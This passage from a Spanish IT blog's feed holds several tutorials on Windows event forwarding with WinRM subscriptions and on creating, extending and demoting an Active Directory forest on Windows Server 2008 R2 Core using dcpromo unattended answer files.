center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-6VdIZ6CpsV4/TyUW2l_ql4I/AAAAAAAABBU/NXiCTL2YjS0/s1600/suscrip_config_7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="243" src="http://2.bp.blogspot.com/-6VdIZ6CpsV4/TyUW2l_ql4I/AAAAAAAABBU/NXiCTL2YjS0/s400/suscrip_config_7.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 10.</strong> Prueba de conexión con el equipo origen correcta</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">Lo siguiente que es necesario&nbsp;hacer&nbsp;es seleccionar los tipos de eventos que se desean recopilar, para lo que se debe hacer clic sobre el botón <em>Seleccionar eventos...</em> y generar el filtro tal y como se muestra en la siguiente figura.</div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-sJOdZ4qgv34/TyUZAzqFOEI/AAAAAAAABBc/2e700qJBUeA/s1600/suscrip_config_8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="316" src="http://4.bp.blogspot.com/-sJOdZ4qgv34/TyUZAzqFOEI/AAAAAAAABBc/2e700qJBUeA/s320/suscrip_config_8.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 11.</strong> Filtro de eventos de la suscripción</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">Lo último que queda pendiente por realizar para completar la suscripción es cambiar las credenciales que va a disponer de los permisos de lectura necesarios en los registros de eventos de origen, en el caso de este artículo se ha configurado la cuenta de Administrador del dominio, algo que logicamente no es nada recomendable en un entorno de producción.</div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-JX1JPfiZ3hQ/TyUapkBjCYI/AAAAAAAABBk/FCkmGqE4GA0/s1600/suscrip_config_9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="232" src="http://1.bp.blogspot.com/-JX1JPfiZ3hQ/TyUapkBjCYI/AAAAAAAABBk/FCkmGqE4GA0/s320/suscrip_config_9.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 12.</strong> Cambio de las credenciales de acceso a los registros de eventos</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">Y con esta última tarea se habrá completado la configuración de la suscripción en el equipo recopilador de evento. </div><div class="separator" style="clear: both; text-align: justify;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-8q7IDyVYUhA/TyUba_PbmVI/AAAAAAAABBs/BSOJNVmj_W0/s1600/suscrip_config_10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="122" src="http://3.bp.blogspot.com/-8q7IDyVYUhA/TyUba_PbmVI/AAAAAAAABBs/BSOJNVmj_W0/s400/suscrip_config_10.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 13.</strong>&nbsp; Visor de eventos con la suscripción generada.</em></td></tr></tbody></table><div class="separator" style="clear: both; text-align: justify;">En la última entrega de este artículo verificaré el correcto funcionamiento de la suscripción generando un evento manualmente en el equipo de origen y verificando que es reenviado al equipo recopilador.</div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Reenvío y recopilación de eventos (I)</title>
      <link>https://www.igalvan.es/posts/reenvio-y-recopilacion-de-eventos-i_6848/</link>
      <pubDate>Sat, 28 Jan 2012 12:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/reenvio-y-recopilacion-de-eventos-i_6848/</guid>
      <description><![CDATA[<div style="text-align: justify;">En este artículo voy a&nbsp;realizar una breve introducción&nbsp;al reenvío y recopilación de eventos de un equipo Windows hacía otro que actuará de almacen. Como viene siendo habitual en los últimos tiempos dividiré el artículo en varias entregas, en este caso serán tres.</div><div style="text-align: justify;"><br /></div><a name='more'></a><div style="text-align: justify;">Para este laboratorio he preparado un <em>Windows 2008 R2 Server Core</em> que actua como controlador de dominio y un equipo con&nbsp;<em>Windows 2008 R2 Enterprise</em> que será el equipo que reciba los eventos del primero según se puede ver en la siguiente figura.</div><div style="text-align: justify;">Como ya sabeís <em>Windows Server Core</em> es un entorno muy espartano, tanto que no tiene ni tan siquiera la consola del visor de eventos. </div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-j768OIli3qw/TyPYWO3648I/AAAAAAAAA_0/WKFnpSXwM3g/s1600/eventvwr_core.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="196" src="http://1.bp.blogspot.com/-j768OIli3qw/TyPYWO3648I/AAAAAAAAA_0/WKFnpSXwM3g/s400/eventvwr_core.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 1</strong>. Ausencia visor de eventos Windows Server Core</em></td></tr></tbody></table><div style="text-align: justify;">Si bien es cierto que se puede abrir la consola desde otro equipo y conectarse al primero esto es practico cuando tienes pocos equipos que revisar pero imaginate el trabajo cuando se trate de una cifra un poco alta. También es cierto que en el mercado existen productos de terceros que realizan estas funciones de forma transparente y totalmente automátizada pero, como casi todo lo bueno, tienen un coste economico importante.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-yGKbxl2JP3I/TyPY7Op1YcI/AAAAAAAAA_8/UWgcxRl817A/s1600/eventvwr_remoto.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="280" src="http://1.bp.blogspot.com/-yGKbxl2JP3I/TyPY7Op1YcI/AAAAAAAAA_8/UWgcxRl817A/s400/eventvwr_remoto.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 2.</strong> Visor de eventos en remoto</em></td></tr></tbody></table><div style="text-align: justify;">El primer paso es configurar en el equipo de origen el <em>Servicio de administración remota de Windows</em> (<em>WinRM</em>) para que permita la admisión de solicitudes de otros equipos. Para ellos debemos abir&nbsp;una consola de simbolo de sistema con elevación de privilegios tal y como se muestra en la siguiente figura.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-MuLjO-SdXpE/TyPdVq1hFOI/AAAAAAAABAM/UqYtYLGJk3c/s1600/winrm_inicio.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="197" src="http://3.bp.blogspot.com/-MuLjO-SdXpE/TyPdVq1hFOI/AAAAAAAABAM/UqYtYLGJk3c/s400/winrm_inicio.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 3.</strong> Elevación privilegios simbolo de sistema</em></td></tr></tbody></table><div style="text-align: justify;">El comando <span style="background-color: #eeeeee; font-family: &quot;Courier New&quot;, Courier, monospace;">winrm quickconfig</span> que se muestra en la siguiente figura permite configurar <em>WinRM</em> de la forma más simple y sencilla. Este método es aceptable para este tutorial pero desde luego no debería ser a forma en la que se configure un entorno de producción.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-vLVRHx2Zpa0/TyPfZfkohfI/AAAAAAAABAU/9Rh5e4CgpXo/s1600/winrm_config.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="196" src="http://2.bp.blogspot.com/-vLVRHx2Zpa0/TyPfZfkohfI/AAAAAAAABAU/9Rh5e4CgpXo/s400/winrm_config.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><em><strong>Ilustración 4.</strong> Configuración rápida de WinRM</em></td></tr></tbody></table><div style="text-align: justify;">Con este paso doy por finalizada esta primera entrega del artículo. En la siguiente explicaré como configurar el equipo recopilador.</div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Windows Server 2008 R2. Generando un bosque de Directorio Activo (y III)</title>
      <link>https://www.igalvan.es/posts/windows-server-2008-r2-generando-un_3925/</link>
      <pubDate>Tue, 17 Jan 2012 00:00:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/windows-server-2008-r2-generando-un_3925/</guid>
      <description><![CDATA[<p>En esta tercera parte del laboratorio vamos a depromocionar el segundo controlador de dominio llamado SRV2 mediante el método desatendido. Las anteriores partes de este tutorial se encuentran en los siguientes enlaces para la parte <a href="http://www.igalvit.es/2012/01/windows-server-2008-r2-generando-un.html" target="_blank">primera </a>y la parte <a href="http://www.igalvit.es/2012/01/windows-server-2008-r2-generando-un_16.html" target="_blank">segunda</a>.<br /><br /><a href="https://www.blogger.com/null" name="more"></a><br />Lo primero es generar el fichero de texto que va a permitir depromocionar el controlador de dominio. Para este laboratorio el contenido de ese fichero es el siguiente:<br /><br /><span style="font-family: 'Courier New', Courier, monospace;">[DCINSTALL]</span><br /><span style="font-family: 'Courier New', Courier, monospace;">UserName=Administrador<una administrativa="" cuenta="" del="" dominio=""><br />UserDomain=OLIMPO<el administrativa="" cuenta="" de="" dominio="" la="" nombre=""><br />Password=Passw0rd<la a="" contrase="" cuenta="" de="" la="" username=""><br />AdministratorPassword=Passw0rd<la a="" administrador="" contrase="" de="" del="" local="" servidor=""><br />RemoveApplicationPartitions=yes<la administrativa="" contiene="" cuenta="" del="" delegaci="" dns="" la="" n="" para="" que="" servidor="" zona=""><la a="" contrase="" cuenta="" de="" dnsdelegationusername="" la=""><br />RebootOnCompletion=yes</la></la></la></la></el></una></span><br /><span style="font-family: 'Courier New', Courier, monospace;"><una administrativa="" cuenta="" del="" dominio=""><el administrativa="" cuenta="" de="" dominio="" la="" nombre=""><la a="" contrase="" cuenta="" de="" la="" username=""><la a="" administrador="" contrase="" de="" del="" local="" servidor=""><la administrativa="" contiene="" cuenta="" del="" delegaci="" dns="" la="" n="" para="" que="" servidor="" zona=""><la a="" contrase="" cuenta="" de="" dnsdelegationusername="" la=""><br /></la></la></la></la></el></una></span>Este fichero se debe copiar en la maquina que se va a depromocionar como controlador de dominio en el bosque que se ha creado. Como siempre mi elección personal es ubicarlo en la raíz de la unidad C con el nombre de fichero &quot;<i>desatendido.txt</i>&quot;:<br /><span style="font-family: 'Courier New', Courier, monospace;"><una administrativa="" cuenta="" del="" dominio=""><el administrativa="" cuenta="" de="" dominio="" la="" nombre=""><la a="" contrase="" cuenta="" de="" la="" username=""><la a="" administrador="" contrase="" de="" del="" local="" servidor=""><la administrativa="" contiene="" cuenta="" del="" delegaci="" dns="" la="" n="" para="" que="" servidor="" zona=""><la a="" contrase="" cuenta="" de="" dnsdelegationusername="" la=""><br /></la></la></la></la></el></una></span><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-a9nRMlMUrm4/TxKie2udaOI/AAAAAAAAA-k/3E8kOhQ2wlU/s1600/43.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-a9nRMlMUrm4/TxKie2udaOI/AAAAAAAAA-k/3E8kOhQ2wlU/s400/43.png" height="290" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td class="tr-caption" style="font-size: 13px;"><i><b>Ilustración 1. </b></i><i>Fichero para la depromoción desatendida</i></td></tr></tbody></table><span style="font-family: Times, 'Times New Roman', serif;"></span><br /><div style="text-align: left;"><span style="font-family: Times, 'Times New Roman', serif;"><span style="font-size: small;">La ejecución del comando es la misma que se ha usado hasta ahora para el proceso de promoción mediante el siguiente comando:</span></span></div><span style="font-family: Times, 'Times New Roman', serif;"></span></td></tr></tbody></table><br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">dcpromo /unattend:desatendido.txt<ruta acceso="" archivo="" de="" del="" respuesta=""></ruta></span></div><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br /></span></div><div style="text-align: left;"></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-ohBjxxiVWuc/TxKeM_MJ4hI/AAAAAAAAA-U/LbWwhHCYNpY/s1600/41.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-ohBjxxiVWuc/TxKeM_MJ4hI/AAAAAAAAA-U/LbWwhHCYNpY/s400/41.jpg" height="197" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i><b>Ilustración 2.</b> Comando para lanzar la instalación desatendida</i></td></tr></tbody></table>Por último, una vez se haya completado el proceso,  se podrá ver desde la consola gráfica de administración que vuelve a existir tan solo un controlador de dominio.<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-52EXULsHnqU/TxKd0FYa7SI/AAAAAAAAA-M/3-_cR2U8hII/s1600/42.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-52EXULsHnqU/TxKd0FYa7SI/AAAAAAAAA-M/3-_cR2U8hII/s400/42.jpg" height="278" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td class="tr-caption" style="font-size: 13px;"><i><b>Ilustración 3. </b></i><i>Consola gráfica mostrando un solo controlador de dominio</i></td></tr></tbody></table><span style="font-size: small;"></span><br /><div style="text-align: left;"><span style="font-size: small;">Ya para terminar este tutorial os dejo un par de enlaces que tratan la instalación desatendida de un controlador de dominio sobre <i>Windows 2008 Server Core</i>.</span></div><span style="font-size: small;"></span></td></tr></tbody></table><una administrativa="" cuenta="" del="" dominio=""><el administrativa="" cuenta="" de="" dominio="" la="" nombre=""><la a="" contrase="" cuenta="" de="" la="" username=""><la a="" administrador="" contrase="" de="" del="" local="" servidor=""><la administrativa="" contiene="" cuenta="" del="" delegaci="" dns="" la="" n="" para="" que="" servidor="" zona=""><la a="" contrase="" cuenta="" de="" dnsdelegationusername="" la=""><a href="http://technet.microsoft.com/en-us/library/cc758390(WS.10).aspx"><a href="http://technet.microsoft.com/en-us/library/cc758390(WS.10).aspx">http://technet.microsoft.com/en-us/library/cc758390(WS.10).aspx</a></a></la></la></la></la></el></una><br /><una administrativa="" cuenta="" del="" dominio=""><el administrativa="" cuenta="" de="" dominio="" la="" nombre=""><la a="" contrase="" cuenta="" de="" la="" username=""><la a="" administrador="" contrase="" de="" del="" local="" servidor=""><la administrativa="" contiene="" cuenta="" del="" delegaci="" dns="" la="" n="" para="" que="" servidor="" zona=""><la a="" contrase="" cuenta="" de="" dnsdelegationusername="" la=""><a href="http://www.windowsnetworking.com/kbase/WindowsTips/WindowsServer2008/AdminTips/ActiveDirectory/PromotingServerCoretoaDomainController.html"><a href="http://www.windowsnetworking.com/kbase/WindowsTips/WindowsServer2008/AdminTips/ActiveDirectory/PromotingServerCoretoaDomainController.html">http://www.windowsnetworking.com/kbase/WindowsTips/WindowsServer2008/AdminTips/ActiveDirectory/PromotingServerCoretoaDomainController.html</a></a></la></la></la></la></el></una><br /><una administrativa="" cuenta="" del="" dominio=""><el administrativa="" cuenta="" de="" dominio="" la="" nombre=""><la a="" contrase="" cuenta="" de="" la="" username=""><la a="" administrador="" contrase="" de="" del="" local="" servidor=""><la administrativa="" contiene="" cuenta="" del="" delegaci="" dns="" la="" n="" para="" que="" servidor="" zona=""><la a="" contrase="" cuenta="" de="" dnsdelegationusername="" la=""><br /></la></la></la></la></el></una></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Windows Server 2008 R2. Generando un bosque de Directorio Activo (II)</title>
      <link>https://www.igalvan.es/posts/windows-server-2008-r2-generando-un_9103/</link>
      <pubDate>Mon, 16 Jan 2012 00:00:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/windows-server-2008-r2-generando-un_9103/</guid>
      <description><![CDATA[<p>Continuamos con esta segunda parte del tutorial de este laboratorio. Puedes encontrar la primera parte en este <a href="http://www.igalvit.es/2012/01/windows-server-2008-r2-generando-un.html" target="_blank">enlace</a>.<br />Ahora que ya hemos generado este primer controlador de dominio, vamos a preparar el fichero de instalación desatendida para la segunda maquina. En este caso es un nuevo controlador de dominio dentro del mismo dominio.<br /><br /><a href="https://www.blogger.com/null" name="more"></a><br />Para la realización de este tutorial, se ha utilizado un fichero con el siguiente contenido:<br /><br /><span style="font-family: 'Courier New', Courier, monospace;">[DCINSTALL]</span><br /><span style="font-family: 'Courier New', Courier, monospace;">UserName=Administrador</span><br /><span style="font-family: 'Courier New', Courier, monospace;">UserDomain=OLIMPO</span><br /><span style="font-family: 'Courier New', Courier, monospace;">Password=</span><br /><span style="font-family: 'Courier New', Courier, monospace;">SiteName=Sitio-Olimpo</span><br /><span style="font-family: 'Courier New', Courier, monospace;">DatabasePath=&quot;%systemroot%ntds&quot;</span><br /><span style="font-family: 'Courier New', Courier, monospace;">LogPath=&quot;%systemroot%ntds&quot;</span><br /><span style="font-family: 'Courier New', Courier, monospace;">SYSVOLPath=&quot;%systemroot%sysvol&quot;</span><br /><span style="font-family: 'Courier New', Courier, monospace;">InstallDNS=yes</span><br /><span style="font-family: 'Courier New', Courier, monospace;">SafeModeAdminPassword=</span><br /><span style="font-family: 'Courier New', Courier, monospace;">ConfirmGC=yes</span><br /><span style="font-family: 'Courier New', Courier, monospace;">RebootOnCompletion=yes</span><br /><span style="font-family: 'Courier New', Courier, monospace;">ReplicaOrNewDomain=Replica</span><br /><span style="font-family: 'Courier New', Courier, monospace;">ReplicaDomainDNSName=olimpo.local</span><br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-tLDxzNUGVVw/TxKcv48ozsI/AAAAAAAAA98/Kd7m1C-KQyI/s1600/21.jpg.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-tLDxzNUGVVw/TxKcv48ozsI/AAAAAAAAA98/Kd7m1C-KQyI/s400/21.jpg.jpg" height="290" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Para este segundo controlador de dominio la secuencia de pasos a seguir después de la generación del fichero difiere ligeramente. Lo primero que vamos a hacer es cambiar la configuración DNS de esta segunda máquina para que su primer servidor DNS sea la IP del primer controlador de dominio que hemos creado anteriormente, de lo contrario no el sistema operativo no será capaz de encontrar el controlador de dominio SRV1.<br /><br /><br /><br />A partir de aquí, los pasos son exactamente iguales que para el primer controlador de dominio. Una vez copiado el fichero de instalación desatendida que hemos generado para este segundo controlador de dominio lanzamos el comando siguiente:<br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span style="background-color: #cccccc;">dcpromo /unattend:desatendido.txt</span><ruta acceso="" archivo="" de="" del="" respuesta=""></ruta></span><br /><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span style="background-color: #cccccc;"><br /></span></span></div><div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-4pTN_OZfI18/TxKcf7t2jrI/AAAAAAAAA9s/rGrUnxADm6c/s1600/22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-4pTN_OZfI18/TxKcf7t2jrI/AAAAAAAAA9s/rGrUnxADm6c/s400/22.jpg" height="197" width="400" /></a></div><br /></div>Una vez se reinicie el controlador de dominio ya se habrá completado la instalación de este segundo controlador de dominio y podemos ver de forma visual la infraestructura que se ha desplegado desde las herramientas de administración que tengamos instaladas en una tercera maquina que tenga una instalación completa de <i>Windows 7</i> o <i>Windows 2008</i>.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-5nqRWMZSIQI/TxKdSEvgFoI/AAAAAAAAA-E/i_kLZchEv_Q/s1600/24.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-5nqRWMZSIQI/TxKdSEvgFoI/AAAAAAAAA-E/i_kLZchEv_Q/s400/24.jpg" height="278" width="400" /></a></div><br />Con esto doy por terminada la segunda parte de este laboratorio y queda pendiente la tarcera parte donde depromocionaremos un controlador de dominio.<br /><br /><br /></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Windows Server 2008 R2. Generando un bosque de Directorio Activo</title>
      <link>https://www.igalvan.es/posts/windows-server-2008-r2-generando-un_5651/</link>
      <pubDate>Sun, 15 Jan 2012 10:59:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/windows-server-2008-r2-generando-un_5651/</guid>
      <description><![CDATA[<div style="text-align: justify;">Una de las posibilidades que más me gustan de <i>Windows Server 2008 Core</i> es su uso para controladores de dominio por dos motivos principalmente:</div><ul><li style="text-align: justify;"><u>Mantenimiento reducido</u>. Un sistema operativo más pequeño y que tiene menos funciones necesita menos mantenimiento de parches y actualizaciones y sobre todo es más seguro porque reduce su superficie de ataque precisamente al tener menos funcionalidades.</li><li style="text-align: justify;"><u>Sistema «anti-manazas»</u>. Es triste decir esto pero, sin animo de entrar en polemicas, en casi todas las organizaciones existen «especialistas» que por una razón u otra disponen de acceso privilegiado a la infraestructura sin tener claros los conceptos de administración y gestión de un Directorio Activo, lo que suele acabar en la ejecución de tareas de recuperación de desastres.</li></ul><div style="text-align: justify;">Pasando al asunto de este artículo, en este microtutorial voy a explicar la forma de crear un nuevo bosque de Directorio Activo en modo <i>Windows 2008 R2</i> y posteriormente añadir un controlador de dominio adicional a este nuevo dominio usando dos maquinas virtuales sobre las que he desplegado <i>Windows 2008 R2 Core</i>.</div><a href="https://www.blogger.com/null" name="more"></a><br /><div style="text-align: justify;">Este tutorial presupone que el usuario ha instalado el sistema operativo en las máquinas y tiene configuradas las tarjetas de red de ambas maquinas y la máquina se encuentra actualizada al último nivel, es decir, las maquinas están preparadas para comenzar con las tareas de creación del bosque de Directorio Activo.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">El esquema final esperado es el siguiente:</div><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-auFKQN6NVac/TxKtr7oKmoI/AAAAAAAAA-s/j93ZpXhg48Q/s1600/10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-auFKQN6NVac/TxKtr7oKmoI/AAAAAAAAA-s/j93ZpXhg48Q/s400/10.png" height="211" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td class="tr-caption"><i><span style="font-size: x-small;"><b>Ilustración 1. </b>Esquema laboratorio bosque W2k8 R2 Core</span></i></td></tr></tbody></table><div style="text-align: left;"><div style="text-align: justify;"><span style="font-size: small;">Antes de comenzar quisiera comentar que el «<i>Asistente para la instalación de Servicios de Directorio Activo»</i> (<i>dcpromo.exe</i>) no admite un entorno gráfico de trabajo en los sistemas <i>Windows 2008 Server Core</i> por lo que se es necesario completar su ejecución en modo desatendido o añadiendo todos los parámetros junto con el comando, lo que me parece un autentico suplicio por lo que en este laboratorio vamos a ver la opción de instalación desatendida.</span></div></div><div style="text-align: justify;"><span style="font-size: small;">El primer paso es crear el fichero de instalación desatendida especifico, en este caso, para generar el nuevo bosque. En este tutorial el contenido del fichero es el siguiente:</span></div><br /><div style="text-align: left;"><span style="font-family: 'Courier New', Courier, monospace;"><span style="font-size: small;">[DCInstall]&nbsp;</span></span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;"></span><br /><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">InstallDNS=yes</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">NewDomain=forest</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">NewDomainDNSName=olimpo.local</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">DomainNetBiosName=olimpo</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">SiteName=Sitio-Olimpo</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">ReplicaOrNewDomain=domain</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">ForestLevel=4</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">DomainLevel=4</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">DatabasePath="%systemroot%ntds"</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">LogPath="%systemroot%ntds"</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">RebootOnCompletion=yes</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">SYSVOLPath="%systemroot%sysvol"</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small;">SafeModeAdminPassword=*</span></div><br /><div style="text-align: justify;"><span style="font-size: small;">Este fichero debemos copiar en la maquina que va a ser el primer controlador de dominio del nuevo bosque de Directorio Activo. Mi opción personal es colocarlo siempre en la raíz de C: con el nombre de fichero "<i>desatendido.txt</i>".</span></div><div style="text-align: justify;"><span style="font-size: small;"><br /></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-SW-mySiKqXE/TxKYuCj2B4I/AAAAAAAAA9k/9U1A6s-1l_Q/s1600/1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-SW-mySiKqXE/TxKYuCj2B4I/AAAAAAAAA9k/9U1A6s-1l_Q/s400/1.jpg" height="275" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Ilustración 2.&nbsp;</b></i><i>Fichero de instalación desatendida</i></span></td></tr></tbody></table><div style="text-align: left;"><span style="font-size: small; text-align: justify;">Posteriormente, una vez iniciada la sesión en la mencionada máquina, desde la consola de terminal que se abre se debe teclear el siguiente comando:</span></div><div style="text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: small;">dcpromo /unattend:desatendido.txt<ruta acceso="" archivo="" de="" del="" respuesta=""></ruta></span><br /><div style="text-align: left;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: small;"><br /></span></div></div><div style="text-align: center;"><div style="text-align: left;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-gQdw4KKZDxY/TxKXgmOjQKI/AAAAAAAAA80/O078xyR09PQ/s1600/2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-gQdw4KKZDxY/TxKXgmOjQKI/AAAAAAAAA80/O078xyR09PQ/s400/2.jpg" height="198" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: x-small;"><b>Ilustración 3.</b> Comando para lanzar la instalación desatendida</span></i></td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-Fh1XKhGFnqk/TxKYAwqASYI/AAAAAAAAA88/k19p_7rwXsA/s1600/3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-Fh1XKhGFnqk/TxKYAwqASYI/AAAAAAAAA88/k19p_7rwXsA/s400/3.jpg" height="198" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Ilustración 4.&nbsp;</b></i><i>Proceso de instalación desatendida (I)</i></span></td></tr></tbody></table><table align="center" cellpadding="0" 